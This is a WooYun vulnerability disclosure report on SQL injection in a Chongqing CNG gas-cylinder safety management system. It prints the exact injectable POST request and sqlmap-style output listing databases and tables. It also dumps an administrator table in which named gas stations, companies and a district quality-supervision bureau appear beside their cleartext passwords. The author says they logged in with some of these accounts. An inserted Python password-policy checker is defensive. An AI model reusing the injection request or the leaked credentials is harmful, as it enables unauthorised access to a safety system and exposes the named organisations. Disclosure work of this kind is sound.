WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
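2015-12-29: Details reported to the vendor; awaiting vendor handling
2016-01-05: Vendor confirmed; details disclosed to the vendor only
2016-01-15: Details disclosed to core white hats and experts in related fields
2016-01-25: Details disclosed to regular white hats
2016-02-04: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public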
The impact is huge!!!
Chongqing CNG Gas Cylinder Electronic Tag Safety Management System
**.**.**.**:5000
SQL injection via POST parameters exists in multiple places.
Here is one request; the title parameter is injectable:
POST /site/jsp/info_index.jsp?type=s HTTP/1.1
Host: **.**.**.**:5000
Content-Length: 9
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:5000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 LBBROWSER
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:5000/site/jsp/info_detail.jsp?id=125985206898403
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=7A365B0EFA7B86086F110789111EE95F

title=%27*
available databases [16]:
[*] CQCNG
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
The data is concentrated mainly in CQCNG. Without further ado, here is the data:
Database: CQCNG
+-----------------------------+-----------+
| Table                       | Entries   |
+-----------------------------+-----------+
| FL_REFUELINGSTATIONS        | 202433124 | gas station information
| FL_PUSHSOCKET5002           | 69198121  | push messages
| FL_REFUELINGSTATIONS2013    | 58300896  |
| FL_PUSHRECORD2013           | 34728357  |
| FL_PUSHRECORD2014           | 33048403  |
| FL_PUSHRECORD2012           | 28624450  |
| FL_PUSHSOCKET5008           | 26431646  |
| FL_PUSHSOCKET5007           | 15833440  |
| FL_PUSHRECORD               | 11335222  | push records
| FL_PUSHSOCKET               | 10548898  |
| PUB_SOCKET_LOG              | 9721219   |
| FL_PUSHRECORD2011           | 9388511   |
| FL_PUSHRECORD_DELLOG        | 3914654   |
| FL_PUSHPACKAGELOG           | 1687948   |
| FL_PUSHSOCKET5009           | 1216605   |
| FL_PUSHMACHINEOPERLOG2013   | 1023746   |
| FL_PUSHMACHINEOPERLOG       | 542563    | push machine operation records
| TAGSENDLOG                  | 339657    | tag sending records
| TAGSEND                     | 268365    |
| PUB_DATE_LOG                | 267982    |
| CK_TREMLY_INFO              | 230015    |
| CK_FIXED_INFO               | 204399    |
| RE_CYLINDERINFO             | 202811    |
| RE_EDITCARINFO_LOG          | 200448    |
| PUB_LOG                     | 149902    |
| RE_CYLINDERINFO_CHANGEREG   | 139523    |
| RE_CARINFO                  | 132464    |
| WT_USE_REGISTRATION         | 119185    |
| RE_CARINFO_CHANGEREG        | 92837     |
| RE_CARINFO_LOG              | 92678     |
| EIDTCARINFO                 | 76830     |
| TEXT                        | 58753     |
| FL_PUSHRECORD_TEMP          | 39902     |
| WT_USE_REGISTRATION_LOG     | 22666     |
| WT_BLACK_REG                | 19446     |
| WT_AGAINCK_LOG              | 9250      |
| SYS_CYLINDERINFO_LOG        | 7752      |
| PUB_USER_PERMISSION         | 7520      |
| RE_CYLINDERINFO_RELOAD      | 6868      |
| RE_CYLINDERINFO_TEMP        | 6688      |
| EDITCARINFO2                | 5708      |
| RE_CARINFO_RELOAD           | 5662      |
| FL_OPERATORINFO_LOG         | 5522      |
| SYS_PAGECOL                 | 3680      |
| RE_CARINFO_TEMP             | 3348      |
| TAGSEND_OLD                 | 2990      |
| RE_CARAGAINCHECKINFO        | 2917      |
| FL_OPERATORINFO             | 2573      |
| WT_ORGANIZATION             | 2162      |
| TAGSENDOLD                  | 1336      |
| RE_CYLINDERINFO_SCRAPPED    | 1124      |
| PUB_CODE_SYS_VALUES         | 1032      |
| WT_BLACK_NOTES              | 965       |
| RE_TUNINGCYLINDERINFO       | 948       |
| RE_CARINFO_SCRAPPED         | 929       |
| FL_PUSHMACHINEPAR           | 788       |
| RE_CARCHECKINFO             | 637       |
| RE_INSTALLFULFILL           | 637       |
| FL_PUSHMACHINEINFO          | 632       |
| PUB_CREATE_CODE             | 604       |
| RE_TUNINGCARINFO            | 560       |
| TAGSENDOLD1                 | 375       |
| PUB_ROLE_PERMISSION         | 270       |
| PUB_USER                    | 265       | administrators
| PUB_BLOB                    | 221       |
| FL_SPECIALTYPE              | 203       |
| QM_TESTTABLE                | 199       |
| PUB_PERMISSION              | 192       |
| WT_PERMISSIONS              | 191       |
| SYS_PAGE                    | 165       |
| TX_UPDATESTATUS             | 145       |
| SYS_PAGEPERSONALITY         | 140       |
| FL_PUSHRECORD_WS_ERR        | 131       |
| CK_BUILD_VERDICT            | 108       |
| WT_ORG_DEFREG               | 106       |
| PUB_UNIT                    | 98        |
| RE_REDOOPERATORINFO         | 79        |
| WT_CYLINDER_SCRAP           | 74        |
| WT_ADMINISTRATIVE_DIVISIONS | 46        |
| PUB_CODE_SYS_INDEX          | 43        |
| WT_CQXZQH                   | 43        |
| WT_INFO                     | 43        |
| MK_CYLINDERINFO             | 40        |
| WT_BLACK_LOG                | 40        |
| PUB_USER_ROLE               | 37        |
| WT_OPERATORINFO             | 36        |
| WT_TAGSENDUP                | 24        |
| WT_WATCHMES_LOG             | 14        |
| MW_CYLINDERINFO             | 9         |
| MW_WHOLECAR                 | 9         |
| PUB_FILES                   | 7         |
| YF                          | 7         |
| PUB_SYSTEM_ROLE             | 6         |
| WT_BLACK_LIST               | 6         |
| WT_PATROL                   | 6         |
| WT_PLOTRULE                 | 6         |
| QRTZ_CRON_TRIGGERS          | 4         |
| QRTZ_JOB_DETAILS            | 4         |
| QRTZ_TRIGGERS               | 4         |
| CK_RE_PURVIEW               | 3         |
| MK_SELLINFO                 | 3         |
| PUB_SYSTEM_PARA             | 2         |
| TEST_APP_USER               | 2         |
| RE_CARINFO_GZGJ             | 1         |
| WT_BUSINESS_PARAMETERS      | 1         |
| WT_ORGANIZATION_TEMP        | 1         |
+-----------------------------+-----------+
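Accounts and passwords of some of the managing organizations. Although Chinese characters are used as login names, weak passwords are a serious problem: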
Table: PUB_USER
[10 entries]
+---------------+-----------+----------+
| NAME | LOGINNAME | PASSWORD |
+---------------+-----------+----------+
| 花园新村加气站 | 花园新村加气站 | lkjhgfd |
| 海星修理厂 | 海星修理厂 | 123456 |
| 天成加气站 | 天成加气站 | 123456 |
| 重庆市博特气瓶检验有限公司 | 博特科技 | 123456 |
| 凯源两路 | 凯源两路 | 123456 |
| 渝北佳顺 | 渝北佳顺 | 123456 |
| 重庆市银泰天然气有限公司 | 长寿银泰 | asdfgh |
| 殷莲 | 大足万隆 | 43780758 |
| 重庆市永川区质监局 | 永川区质监局 | 87163104 |
| 荣昌渝昌加气站 | 荣昌渝昌 | 123456 |
+---------------+-----------+----------+
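The weak-password patterns visible in the table above (123456, keyboard-row walks typed forward or backward, short all-digit strings) can be rejected at the moment a password is set. The following is an added example, not part of the original report or the vendor's code; the account names, deny-list, minimum length and finding labels are constructed assumptions.

```python
# Keyboard rows used to detect "walk" passwords such as asdfgh or lkjhgfd.
KEY_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]
# Small constructed deny-list; a real deployment would load a much larger one.
COMMON = {"123456", "password", "111111", "12345678", "admin"}
MIN_LENGTH = 10  # assumed policy value, not taken from the report

# Constructed sample accounts (hypothetical logins, not the report's data).
SAMPLE_ACCOUNTS = {
    "station-a": "123456",
    "station-b": "lkjhgfd",
    "inspector-c": "asdfgh",
    "bureau-d": "40519276",
    "ops-e": "T7#mVq2!xLp9wz",
}


def is_keyboard_walk(pw: str, min_run: int = 5) -> bool:
    """True if pw is one contiguous run along a keyboard row, in either direction."""
    p = pw.lower()
    if len(p) < min_run:
        return False
    return any(p in row or p in row[::-1] for row in KEY_ROWS)


def audit_password(login: str, pw: str) -> list[str]:
    """Return the policy findings for one candidate password (empty = acceptable)."""
    findings = []
    if len(pw) < MIN_LENGTH:
        findings.append("too_short")
    if pw.lower() in COMMON:
        findings.append("common")
    if is_keyboard_walk(pw):
        findings.append("keyboard_walk")
    if pw.isdigit():
        findings.append("digits_only")
    if login and login.lower() in pw.lower():
        findings.append("contains_login")
    return findings


def audit_accounts(accounts: dict[str, str]) -> dict[str, list[str]]:
    """Map each login to its findings, keeping only the accounts that fail."""
    report = {login: audit_password(login, pw) for login, pw in accounts.items()}
    return {login: found for login, found in report.items() if found}


if __name__ == "__main__":
    for login, found in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{login}: {', '.join(found)}")
```

The check is meant to run on the candidate password when it is set or changed, so the application never needs to keep the cleartext afterwards.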
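Logged in with some of the accounts.
In addition, vehicle information can be queried without logging in.
This system really should get someone dedicated to rescue it.
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-01-05 11:15
CNVD confirmed and reproduced the situation described; it has been passed on by CNCERT to the Chongqing branch center, which will coordinate follow-up handling with the organization that manages the site.
None yet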